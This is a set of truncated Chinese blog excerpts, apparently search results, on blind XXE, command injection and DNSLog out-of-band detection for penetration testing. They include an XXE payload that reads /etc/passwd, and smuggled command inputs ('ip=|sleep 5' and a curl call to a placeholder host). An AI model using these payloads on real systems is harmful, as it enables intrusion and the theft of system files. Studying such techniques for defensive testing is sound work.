转载学习于红日安全 一、有回显 （1）直接将外部实体引用的URI设置为敏感目录 <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> ...

一、命令执行判断 命令执行可能会存在命令执行完没有回显，可以通过三种方式来判断：延时、HTTP延时、DNS请求。 1、延时 1）通过使用sleep()函数，即是否延时来判断该命令是否有执行，有延时则代表有执行。类似的函数还有 benchmark(count,expr) 和getlock ...

一、什么是DNSLog DNS的全称是Domain Name System（网络名称系统），它作为将域名和IP地址相互映射，使人更方便地访问互联网。当用户输入某一网址如www.baidu.com，网 ...

0x01 原理 NS（Name Server）记录是域名服务器记录，用来指定该域名由哪个DNS服务器来进行解析 DNS：域名解析服务器 A记录：指定域名对应的IP地址 一句话归纳😪😪 ...

测试一些网站的时候，一些注入都是无回显的，我们可以写脚本来进行盲注，但有些网站会ban掉我们的ip，这样我们可以通过设置ip代理池解决， 但是盲注往往效率很低，所以产生了DNSlog注入 DNSLOG的原理 DNS的解析是递归与迭代相结合的，下面给出了当我们访问 ...

0x01 DNSLOG回显原理 测试一些网站的时候，一些注入都是无回显的，我们可以写脚本来进行盲注，但有些网站会ban掉我们的ip，这样我们可以通过设置ip代理池解决， 但是盲注往往效率很低，所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名，比如：ceye.io ...

前言 本文主要讲的是无回显、不出网命令执行测试方法，首先通过大小写判断是linux还是win，然后通过命令自动查找目录写文件来测试。 这里没有这种环境就拿一个php的做演示（其实像这种可以直接写马在当前目录） 首先我们通过下面命令和响应包的时间判断存在命令执行（适用于win linux下使用 ...

本文由学习https://xz.aliyun.com/t/8125中收获得知识而来，附带个人的一些思考。 甲、php无回显时命令注入判断方法 利用延时 ip=|sleep 5 HTTP请求 ip=|Curl 'http://x.x.x.x:233' Nc -lvv ...